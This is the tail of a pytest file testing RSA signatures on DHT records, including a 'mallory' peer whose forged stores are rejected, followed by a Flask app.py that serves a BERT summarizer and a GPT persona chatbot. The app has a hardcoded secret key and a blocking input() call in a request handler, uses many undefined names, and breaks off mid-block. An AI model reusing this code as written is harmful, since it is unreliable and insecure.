assert receiver_validator.validate(plain_record)
# test 2: Correct signatures
signed_records = [
dataclasses.replace(record, value=sender_validator.sign_value(record)) for record in protected_records
]
for record in signed_records:
assert receiver_validator.validate(record)
assert receiver_validator.strip_value(record) == b"value"
# test 3: Invalid signatures
signed_records = protected_records # Without signature
signed_records += [
dataclasses.replace(record, value=record.value + b"[signature:INVALID_BYTES]") for record in protected_records
] # With invalid signature
signed_records += [
dataclasses.replace(record, value=mallory_validator.sign_value(record)) for record in protected_records
] # With someone else's signature
for record in signed_records:
assert not receiver_validator.validate(record)
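# Validators created without an explicit key are expected to share a cached
# process-wide key (matching public keys); passing a fresh RSAPrivateKey
# produces a distinct one.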
def test_cached_key():
first_validator = RSASignatureValidator()
second_validator = RSASignatureValidator()
assert first_validator.local_public_key == second_validator.local_public_key
third_validator = RSASignatureValidator(RSAPrivateKey())
assert first_validator.local_public_key != third_validator.local_public_key
def test_validator_instance_is_picklable():
# Needs to be picklable because the validator instance may be sent between processes
original_validator = RSASignatureValidator()
unpickled_validator = pickle.loads(pickle.dumps(original_validator))
# To check that the private key was pickled and unpickled correctly, we sign a record
# with the original public key using the unpickled validator and then validate the signature
record = DHTRecord(
key=b"key",
subkey=b"subkey" + original_validator.local_public_key,
value=b"value",
expiration_time=get_dht_time() + 10,
)
signed_record = dataclasses.replace(record, value=unpickled_validator.sign_value(record))
assert b"[signature:" in signed_record.value
assert original_validator.validate(signed_record)
assert unpickled_validator.validate(signed_record)
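# Child-process target: receive a validator and a record over the pipe, sign
# the record with it, and send the signed record back to the parent.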
def get_signed_record(conn: mp.connection.Connection) -> DHTRecord:
validator = conn.recv()
record = conn.recv()
record = dataclasses.replace(record, value=validator.sign_value(record))
conn.send(record)
return record
def test_signing_in_different_process():
parent_conn, child_conn = mp.Pipe()
process = mp.Process(target=get_signed_record, args=[child_conn])
process.start()
validator = RSASignatureValidator()
parent_conn.send(validator)
record = DHTRecord(
key=b"key", subkey=b"subkey" + validator.local_public_key, value=b"value", expiration_time=get_dht_time() + 10
)
parent_conn.send(record)
signed_record = parent_conn.recv()
assert b"[signature:" in signed_record.value
assert validator.validate(signed_record)
@pytest.mark.forked
@pytest.mark.asyncio
async def test_dhtnode_signatures():
alice = await DHTNode.create(record_validator=RSASignatureValidator())
initial_peers = await alice.get_visible_maddrs()
bob = await DHTNode.create(record_validator=RSASignatureValidator(RSAPrivateKey()), initial_peers=initial_peers)
mallory = await DHTNode.create(
record_validator=RSASignatureValidator(RSAPrivateKey()), initial_peers=initial_peers
)
key = b"key"
subkey = b"protected_subkey" + bob.protocol.record_validator.local_public_key
assert await bob.store(key, b"true_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert (await alice.get(key, latest=True)).value[subkey].value == b"true_value"
store_ok = await mallory.store(key, b"fake_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert not store_ok
assert (await alice.get(key, latest=True)).value[subkey].value == b"true_value"
assert await bob.store(key, b"updated_true_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert (await alice.get(key, latest=True)).value[subkey].value == b"updated_true_value"
await bob.shutdown() # Bob has shut down, now Mallory is the single peer of Alice
store_ok = await mallory.store(key, b"updated_fake_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert not store_ok
assert (await alice.get(key, latest=True)).value[subkey].value == b"updated_true_value"
|
app.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Main training workflow
"""
from __future__ import division
import os
import sys
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(PROJECT_ROOT, "..")))
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
from flask import Flask, request, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__file__)
# logger.info(pformat(args))
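# argparse helper so boolean flags accept yes/no style strings
# (used below as type=str2bool).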
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
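# Checkpoint validation: with -test_all, sweep every saved checkpoint, rank them
# by validation loss and run test_abs on the best few; otherwise keep watching
# the model directory and validate/test each new checkpoint as it appears.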
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
def test_text_abs(args):
logger.info('Loading checkpoint from %s' % args.test_from)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
checkpoint = torch.load(args.test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.load_text(args, args.text_src, args.text_tgt, device)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, -1)
class Map(dict):
"""
Example:
m = Map({'first_name': 'Eduardo'}, last_name='Pool', age=24, sports=['Soccer'])
"""
def __init__(self, *args, **kwargs):
super(Map, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr):
return self.get(attr)
def __setattr__(self, key, value):
self.__setitem__(key, value)
def __setitem__(self, key, value):
super(Map, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item):
self.__delitem__(item)
def __delitem__(self, key):
super(Map, self).__delitem__(key)
del self.__dict__[key]
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/predict', methods=['GET', 'POST'])
def predict():
if request.method == 'POST':
        # copied from def run(): the args dict here is replaced with the actual, already-parsed parameter set #########
args = {'dataset_path': './persona_2ver_1500pers_en.json',
'dataset_cache': './dataset_cache',
'model': 'openai-gpt',
'model_checkpoint': './runs/Nov23_16-25-39_joo-tf_openai-gpt/',
'max_history': 2,
'device': 'cpu', # cuda
'max_length': 30,
'min_length': 2,
'seed': 0,
'temperature': 0.7,
'top_k': 0,
'top_p': 0.9,
}
args2 = Map(args)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__file__)
# logger.info(pformat(args))
if args['model_checkpoint'] == "":
if args['model'] == 'gpt2':
raise ValueError("Interacting with GPT2 requires passing a finetuned model_checkpoint")
else:
args['model_checkpoint'] = download_pretrained_model()
if args['seed'] != 0:
random.seed(args['seed'])
torch.random.manual_seed(args['seed'])
torch.cuda.manual_seed(args['seed'])
logger.info("Get pretrained model and tokenizer")
tokenizer_class, model_class = (GPT2Tokenizer, GPT2LMHeadModel) if args['model'] == 'gpt2' else (
OpenAIGPTTokenizer, OpenAIGPTLMHeadModel)
tokenizer = tokenizer_class.from_pretrained(args['model_checkpoint'])
model = model_class.from_pretrained(args['model_checkpoint'])
model.to(args['device'])
add_special_tokens_(model, tokenizer)
logger.info("Sample a personality")
dataset = get_dataset(tokenizer, args['dataset_path'], args['dataset_cache'])
personalities = [dialog["personality"] for dataset in dataset.values() for dialog in dataset]
# personality = random.choice(personalities)
personality = personalities[1] # the first is about ze
logger.info("Selected personality: %s", tokenizer.decode(chain(*personality)))
###############################################################################################################
        # the actual PyTorch model inference call, taken from interact.py
history = []
raw_text = request.get_json(force=True)['raw_text'] # {"raw_text":"some text to pass in pytorch gpt", "username": "fizz bizz"}
print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
raw_text = input(">>> ")
history.append(tokenizer.encode(raw_text))
with torch.no_grad():
out_ids = interact.sample_sequence(personality, history, tokenizer, model, args2)
history.append(out_ids)
history = history[-(2 * args2.max_history + 1):]
out_text = tokenizer.decode(out_ids, skip_special_tokens=True)
print(out_text)
return jsonify({'q': raw_text, 'a': out_text})
if request.method == 'GET':
        # copied from def run(): the args dict here is replaced with the actual, already-parsed parameter set #########
args = {'dataset_path': './persona_2ver_1500pers_en.json',
'dataset_cache': './dataset_cache',
'model': 'openai-gpt',
'model_checkpoint': './runs/Nov23_16-25-39_joo-tf_openai-gpt/',
'max_history': 2,
'device': 'cpu', # cuda
'max_length': 30,
'min_length': 2,
'seed': 0,
'temperature': 0.7,
'top_k': 0,
'top_p': 0.9,
}
args2 = Map(args)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__file__)
# logger.info(pformat(args))
if args['model_checkpoint'] == "":
if args['model'] == 'gpt2':
raise ValueError("Interacting with GPT2 requires passing a finetuned model_checkpoint")
else:
args['model_checkpoint'] = download_pretrained_model()
if args['seed'] != 0:
random.seed(args['seed'])
torch.random.manual_seed(args['seed'])
torch.cuda.manual_seed(args['seed'])
logger.info("Get pretrained model and tokenizer")
tokenizer_class, model_class = (GPT2Tokenizer, GPT2LMHeadModel) if args['model'] == 'gpt2' else (
OpenAIGPTTokenizer, OpenAIGPTLMHeadModel)
tokenizer = tokenizer_class.from_pretrained(args['model_checkpoint'])
model = model_class.from_pretrained(args['model_checkpoint'])
model.to(args['device'])
add_special_tokens_(model, tokenizer)
logger.info("Sample a personality")
dataset = get_dataset(tokenizer, args['dataset_path'], args['dataset_cache'])
personalities = [dialog["personality"] for dataset in dataset.values() for dialog in dataset]
# personality = random.choice(personalities)
personality = personalities[1] # the first is about ze
logger.info("Selected personality: %s", tokenizer.decode(chain(*personality)))
###############################################################################################################
        # the actual PyTorch model inference call, taken from interact.py
history = []
# raw_text = request.get_json(force=True)['raw_text'] # {"raw_text":"some text to pass in pytorch gpt", "username": "fizz bizz"}
raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/predict?raw_text=how
print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
raw_text = input(">>> ")
history.append(tokenizer.encode(raw_text))
with torch.no_grad():
out_ids = interact.sample_sequence(personality, history, tokenizer, model, args2)
history.append(out_ids)
history = history[-(2 * args2.max_history + 1):]
out_text = tokenizer.decode(out_ids, skip_special_tokens=True)
print(out_text)
return jsonify({'q': raw_text, 'a': out_text})
@app.route('/get_summary', methods=['GET', 'POST'])
def get_summary():
if request.method == 'POST':
raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/get_summary?raw_text=how
# print('########### raw_text: ', raw_text)
        if not raw_text:
            return jsonify({'error': 'raw_text must not be empty'}), 400
        # persist the request text where -text_src points (see the parser defaults below)
        with open("../raw_data/raw_text.txt", "w", encoding="utf-8") as file1:
            file1.write(raw_text)
#############
        # some args are changed to match the inference launch parameters:
# python train.py -task abs -mode test_text -text_src '../raw_data/naked_photos_petapixel.txt' -bert_data_path '../bert_data/' -ext_dropout 0.1 -model_path '../models/' -test_from '../models/model_step_154000.pt' -lr 2e-3 -visible_gpus -1 -report_every 50 -save_checkpoint_steps 1000 -batch_size 140 -train_steps 50000 -accum_count 2 -log_file ../logs/abs_bert -use_interval true -warmup_steps 10000 -max_pos 512 -max_length 200 -alpha 0.95 -min_length 50 -result_path '../results/cnndm' -test_all True
#############
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='abs', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='test_text', type=str, choices=['train', 'validate', 'test', 'test_text'])
parser.add_argument("-bert_data_path", default='../bert_data/')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-text_src", default='../raw_data/raw_text.txt')
parser.add_argument("-text_tgt", default='')
parser.add_argument("-batch_size", default=140, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_ndocs_in_batch", default=6, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-large", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-load_from_extractive", default='', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.1, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=40, type=int)
parser.add_argument("-max_length", default=200, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default=0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/abs_bert')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-test_from", default='../models/model_step_154000.pt')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
        # Note: args = parser.parse_args() is commented out because it crashes when run under gunicorn https://github.com/benoitc/gunicorn/issues/1867
#args = parser.parse_args()
        # Workaround for the argparse/gunicorn argument conflict https://stackoverflow.com/questions/32802303/python-flask-gunicorn-error-unrecognized-arguments
args, unknown = parser.parse_known_args()
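        # With parse_known_args(), gunicorn's own CLI flags (e.g. --bind or --workers) simply end up
        # in `unknown` and are ignored, instead of making argparse abort the worker.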
        # the most important arguments for summarization:
# args = {'task': 'abs',
# 'mode': 'test_text',
# 'model_path': '../models/',
# 'result_path': '../results/cnndm',
# 'text_src': '../raw_data/raw_text.txt',
# 'device': 'cpu', # cuda
# 'test_from': '../models/model_step_154000.pt',
# 'visible_gpus': '-1',
# 'gpu_ranks': '0',
# 'log_file': '../logs/abs_bert',
# 'max_pos': 512,
# 'dec_ff_size': 2048,
# 'dec_dropout': 0.2,
# }
# args = Map(args)
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if (args.task == 'abs'):
if (args.mode == 'train'):
train_abs(args, device_id)
elif (args.mode == 'validate'):
validate_abs(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_abs(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_abs(args) # inference test_text_abs ONLY
elif (args.task == 'ext'):
if (args.mode == 'train'):
train_ext(args, device_id)
elif (args.mode == 'validate'):
validate_ext(args, device_id)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_ext(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_ext(args)
        # the summary text is written to results/cnndm.-1.candidate
f = open("../results/cnndm.-1.candidate", "r")
if f.mode == 'r':
out_text = f.read()
from nltk.tokenize import sent_tokenize
out_text = out_text.replace('<q>', '. ')
input_sen = out_text # 'hello! how are you? please remember capitalization. EVERY time.'
sentences = sent_tokenize(input_sen)
sentences = [sent.capitalize() for sent in sentences]
print(sentences)
text_summary = ' '.join([str(elem) for elem in sentences])
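        # e.g. a raw candidate "the cat sat<q>it purred" has now become "The cat sat. It purred"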
return jsonify({'text_full': raw_text, 'text_summary': text_summary})
if request.method == 'GET':
raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/get_summary?raw_text=how
# print('########### raw_text: ', raw_text)
        if not raw_text:
            # an empty prompt cannot be summarized, so fail fast instead of looping forever
            return jsonify({'error': 'raw_text must not be empty'}), 400
        file1 = open("../raw_data/raw_text.txt", "w+", encoding='utf-8')
        file1.write(raw_text)  # write the raw text itself, not the repr of its UTF-8 bytes
file1.close()
#############
        # some args are changed to match the inference launch parameters:
# python train.py -task abs -mode test_text -text_src '../raw_data/naked_photos_petapixel.txt' -bert_data_path '../bert_data/' -ext_dropout 0.1 -model_path '../models/' -test_from '../models/model_step_154000.pt' -lr 2e-3 -visible_gpus -1 -report_every 50 -save_checkpoint_steps 1000 -batch_size 140 -train_steps 50000 -accum_count 2 -log_file ../logs/abs_bert -use_interval true -warmup_steps 10000 -max_pos 512 -max_length 200 -alpha 0.95 -min_length 50 -result_path '../results/cnndm' -test_all True
#############
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='abs', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='test_text', type=str, choices=['train', 'validate', 'test', 'test_text'])
parser.add_argument("-bert_data_path", default='../bert_data/')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-text_src", default='../raw_data/raw_text.txt')
parser.add_argument("-text_tgt", default='')
parser.add_argument("-batch_size", default=140, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_ndocs_in_batch", default=6, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-large", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-load_from_extractive", default='', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.1, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=40, type=int)
parser.add_argument("-max_length", default=200, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default=0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
